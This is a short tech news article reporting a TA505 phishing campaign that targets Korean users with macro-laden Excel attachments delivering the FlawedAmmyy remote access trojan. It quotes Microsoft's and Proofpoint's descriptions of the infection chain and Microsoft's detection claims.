The malware attacks start with an email and an .xls attachment. The attachment has content written in Korean language that hints that the malware has currently made Korean users as its primary target. The malware uses malicious macro features of the MS Excel spreadsheet attachment to attack the Windows PC. According to a security firm Proofpoint, the malicious attack campaign was started by a group named TA505. They were caught in the past using similar patterns to attack the PC using malware. The security firm further states that this time, the group is using a malicious email along with an Excel attachment which Microsoft itself has asked the users not to open. Microsoft has warned the users about the malware attacks using its Twitter account. It has tweeted, “When opened, the .xls file automatically runs a macro function that runs msiexec.exe, and that, in turn downloads an MSI archive. The MSI archive contains a digitally signed executable that is extracted and run[s], and that decrypts and runs another executable in memory.”
Microsoft has also said that its Threat Protection defends the users from this type of attacks. According to the company, “Cloud-based machine learning protections in Microsoft Defender ATP blocked all of the components of this attack at first sight, including the FlawedAmmyy RAT payload. Office 365 ATP detects the email campaign.” Once the user downloads the attachment on his system, the malware also installs a file named wsus.exe. The downloaded file is then decrypted and it is designed in such a way that it would pass off as an official Microsoft Windows Service Update Service (WSUS). The digital signature of the file is signed on June 19 and it then decrypts the payload it is carrying in the RAM. The payload is none other than FlawedAmmyy Rat that has a notorious reputation. or the latest gadget and tech news, and gadget reviews, follow us on Twitter, Facebook and Instagram. For newest tech & gadget videos subscribe to our YouTube Channel. You can also stay up to date using the Gadget Bridge Android App